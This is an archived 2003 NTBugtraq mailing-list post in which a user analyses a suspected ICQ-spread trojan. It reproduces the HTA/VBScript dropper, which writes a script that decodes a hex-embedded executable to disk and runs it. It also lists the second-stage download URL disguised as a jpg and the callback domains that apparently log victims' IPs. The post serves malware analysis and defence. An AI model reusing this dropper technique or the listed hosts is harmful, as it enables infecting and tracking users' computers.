New Virus?

From: Michael Bemmerl (security_at_ASTROBOX.NET)
Date: 12/06/03

  • Next message: Jason Clishe: "MSN Messenger forced upgrade" 
    Date:         Sat, 6 Dec 2003 00:04:23 +0100
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Hi everybody!

    Today I got an ICQ-Message from an user called "Monica" (Just search on ICQ:
    http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Moniqu
    e&LastName=&NickName=Monica&Country=49). In her details is an URL:
    http://www.rsngermany.com/my_foto.htm This is a fake 404-Error-Page, because
    in the <head>-tags is a link to http://www.rsngermany.com/dn2.hta :

    [HTML]
    [HEAD]
    [TITLE]Windows Update[/TITLE]
    [HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none"
    BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no"
    MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no"
    SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/]
    [SCRIPT LANGUAGE="VBScript"]
    MyFile = "q.vbs"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set TSO = FSO.CreateTextFile(MyFile, True)
    TSO.write "WScript.Sleep(50000)" & vbcrlf
    TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" &
    vbcrlf
    TSO.write "szApplication = ""x.exe""" & vbcrlf
    TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
    TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" &
    vbcrlf
    TSO.write "intLength = len(szBinary)" & vbcrlf
    TSO.write "intPosition = 1" & vbcrlf
    TSO.write "while intPosition [ intLength" & vbcrlf
    TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
    TSO.write "hFile.Write(Chr(char))" & vbcrlf
    TSO.write "intPosition = intPosition+2" & vbcrlf
    TSO.write "wend" & vbcrlf
    TSO.write "hFile.Close" & vbcrlf
    TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
    TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
    TSO.close
    Set TSO = Nothing
    Set FSO = Nothing
    # Dim WshShell
    # Set WshShell = CreateObject("WScript.Shell")
    # WshShell.Run "q.vbs", 0, false
    [/SCRIPT]
    [script]window.close()[/script]
    [/HEAD]
    [/html]

    The .hta creates a file named q.vbs. That creates and runs x.exe. Notice the
    unset parameter szURL in q.vbs (I asume that you can specify where to
    download the next files - empty could mean that the files are loaded from
    the coded location: http://rsngermany.com). The x.exe is FSG-packed; you can
    upack it with Un-FSG! (just google for it). The file will download another
    exe-File, tarned as jpg: http://www.rsngermany.com/3.jpg

    I tested this exe with wine, it creates two files in the windows-dir.:
    msreg.exe and fghy.exe (again packed with FSG) and two in system32:
    svchostc.exe and svchosts.exe. Maybe it creates some run-entries in the
    registry, but i couldn't test this. And it sends request to various domains:

    All requests end in 404-Errors, except two (see end of list)
    (replace * with d and f)

    comdat.de/kreta/yif.php
    www.dataforcecg.com/webvision/yi*.php
    www.eurostretch.ru/yi*.php
    www.hhc-online.de/home/links/pics/yi*.php
    www.courie.ru/style/yi*.php
    mucuc.h10.ru/forum/yi*.php
    www.gran-pri.ru/yi*.php
    www.mir-auto.ru/yi*.php
    artesproduction.com/yif.php

    comdat.de/kreta/yid.php --> 301, redirection to comcat.de/kreta/zid.php
    comdat.de/kreta/zid.php --> 200, just prints out your ip. Maybe the author
    logs infected PC's
    artesproduction.com/yid.php --> 200, again prints out the ip

    The svchosts.exe has some HTTP-response-message for Error 400, 502 and 503

    I tested the files with NAV2003, latest def., no infection.

    Some ideas what it could be?

    Greetings,
    Michael

    -----
    Marcus Ranum's new book "The Myth of Homeland Security" is now out and
    is available from http://www.amazon.com/ranum In this hard-hitting
    review of the homeland security business, Ranum shows us how the problem
    is vastly harder than it's being made to sound, and how special
    interests, *** covering, and bureaucracy are threatening to derail any
    chance of making progress.
    -----

  • Next message: Jason Clishe: "MSN Messenger forced upgrade"